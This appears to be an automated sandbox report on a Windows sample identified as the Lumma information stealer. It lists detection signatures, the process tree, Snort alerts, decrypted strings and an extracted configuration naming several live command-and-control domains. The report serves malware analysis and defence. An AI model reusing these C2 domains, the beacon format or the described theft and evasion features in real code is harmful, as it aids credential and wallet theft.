Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1432518
MD5:	24dd75b0a7bb9a0e0918ee0dd84a581a
SHA1:	de796b237488df3d26a99aa8a78098c010aeb2c9
SHA256:	878966291372a9633242af15570a8bbe31699b5e0b650e806af4742da1f6b35d
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 24DD75B0A7BB9A0E0918EE0DD84A581A)

chrome.exe (PID: 7076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,15247930655043870069,15177389296022328392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop", "wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop", "wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop"], "Build id": "pGlMMn--qb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4dd69:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: file.exe PID: 6884	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6884	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Snort Signatures

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:27.497604
SID:	2052047
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	04/27/24-13:26:36.893528
SID:	2052046
Source Port:	54027
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:23.378200
SID:	2052047
Source Port:	49751
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	04/27/24-13:27:32.334368
SID:	2052046
Source Port:	60308
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:26.585236
SID:	2052047
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	04/27/24-13:26:23.272724
SID:	2052046
Source Port:	65136
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:29.422008
SID:	2052047
Source Port:	49757
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:25.775214
SID:	2052047
Source Port:	49753
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:24.897555
SID:	2052047
Source Port:	49752
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:28.686063
SID:	2052047
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.155.93

Timestamp:	04/27/24-13:26:31.854854
SID:	2052047
Source Port:	49758
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	04/27/24-13:27:00.927077
SID:	2052046
Source Port:	60371
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: pushjellysingeywus.shop	Avira URL Cloud: Label: malware
Source: bordersoarmanusjuw.shop	Avira URL Cloud: Label: malware
Source: economicscreateojsu.shop	Avira URL Cloud: Label: malware
Source: wifeplasterbakewis.shop	Avira URL Cloud: Label: malware
Source: entitlementappwo.shop	Avira URL Cloud: Label: malware
Source: suitcaseacanehalk.shop	Avira URL Cloud: Label: malware
Source: mealplayerpreceodsju.shop	Avira URL Cloud: Label: malware
Source: absentconvicsjawun.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.6884.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop", "wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop", "wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "palmeventeryjusk.shop"], "Build id": "pGlMMn--qb"}

Multi AV Scanner detection for domain / URL

Source: economicscreateojsu.shop	Virustotal: Detection: 13%	Perma Link
Source: https://palmeventeryjusk.shop/api	Virustotal: Detection: 13%	Perma Link
Source: https://palmeventeryjusk.shop:443/api	Virustotal: Detection: 13%	Perma Link
Source: entitlementappwo.shop	Virustotal: Detection: 17%	Perma Link
Source: absentconvicsjawun.shop	Virustotal: Detection: 18%	Perma Link
Source: mealplayerpreceodsju.shop	Virustotal: Detection: 18%	Perma Link

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wifeplasterbakewis.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mealplayerpreceodsju.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bordersoarmanusjuw.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: suitcaseacanehalk.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: absentconvicsjawun.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pushjellysingeywus.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: economicscreateojsu.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: entitlementappwo.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: palmeventeryjusk.shop
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2026163901.0000000002440000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pGlMMn--qb

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_028F5B57 CryptUnprotectData,

0_2_028F5B57

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49760 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0239D23C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	0_2_02371209
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	0_2_0237D36C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_0236401C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then not ecx	0_2_0237911D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	0_2_0237F11C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000180h]	0_2_02373175
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h	0_2_0237515E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02379631
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_02383627
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	0_2_02372697
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	0_2_0236B75C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_023794B4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	0_2_0237849E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_02397507
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_023845AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_02384590
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_02375A77
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then test edi, edi	0_2_0239BB15
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02393B7C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_0239C86C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_023788A5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push edi	0_2_02371915
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000008A0h]	0_2_02380955
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_0237694C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h	0_2_023839BC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	0_2_02372989
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000F0h]	0_2_02374EBA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_0239CEAC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then xor eax, eax	0_2_0239AE9D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_02399F12
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_02377FBE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_02378C75
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esi+000001C0h]	0_2_02385C7C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_02376C52
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	0_2_0236ECFC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000080h]	0_2_02382CEC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0237CCDC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	0_2_02376DCC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000080h]	0_2_029012B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_028F7239
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	0_2_028F5390
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_02915ACB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0291B800
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_0291AE30
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h	0_2_02901F80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_028F4F10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	0_2_028E9D20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_028FB2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	0_2_028ED2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_028F5216
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esi+000001C0h]	0_2_02904240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then test edi, edi	0_2_0291A0D9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_028F403B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02912140
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then not ecx	0_2_028F76E1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	0_2_028FD6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_02904786
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	0_2_028EF7CD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h	0_2_028F3722
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000180h]	0_2_028F1739
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_029184D6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_0291B470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then xor eax, eax	0_2_02919461
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000F0h]	0_2_028F347E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_028F6582
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_028E25E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	0_2_028F6A62
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_028F7A78
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_028F7BF5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_02901BEB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_02902B54
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_02902B70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	0_2_028FB930
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push edi	0_2_028EFED9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_028F6E69
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000008A0h]	0_2_028FEF19
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	0_2_028F0F4D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	0_2_028F0C5B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2052046 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) 192.168.2.4:65136 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49751 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49752 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49753 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49754 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49755 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49756 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49757 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052047 ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI) 192.168.2.4:49758 -> 172.67.155.93:443
Source: Traffic	Snort IDS: 2052046 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) 192.168.2.4:54027 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052046 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) 192.168.2.4:60371 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052046 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop) 192.168.2.4:60308 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wifeplasterbakewis.shop
Source: Malware configuration extractor	URLs: mealplayerpreceodsju.shop
Source: Malware configuration extractor	URLs: bordersoarmanusjuw.shop
Source: Malware configuration extractor	URLs: suitcaseacanehalk.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: pushjellysingeywus.shop
Source: Malware configuration extractor	URLs: economicscreateojsu.shop
Source: Malware configuration extractor	URLs: entitlementappwo.shop
Source: Malware configuration extractor	URLs: palmeventeryjusk.shop
Source: Malware configuration extractor	URLs: wifeplasterbakewis.shop
Source: Malware configuration extractor	URLs: mealplayerpreceodsju.shop
Source: Malware configuration extractor	URLs: bordersoarmanusjuw.shop
Source: Malware configuration extractor	URLs: suitcaseacanehalk.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: pushjellysingeywus.shop
Source: Malware configuration extractor	URLs: economicscreateojsu.shop
Source: Malware configuration extractor	URLs: entitlementappwo.shop
Source: Malware configuration extractor	URLs: palmeventeryjusk.shop
Source: Malware configuration extractor	URLs: wifeplasterbakewis.shop
Source: Malware configuration extractor	URLs: mealplayerpreceodsju.shop
Source: Malware configuration extractor	URLs: bordersoarmanusjuw.shop
Source: Malware configuration extractor	URLs: suitcaseacanehalk.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: pushjellysingeywus.shop
Source: Malware configuration extractor	URLs: economicscreateojsu.shop
Source: Malware configuration extractor	URLs: entitlementappwo.shop
Source: Malware configuration extractor	URLs: palmeventeryjusk.shop

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
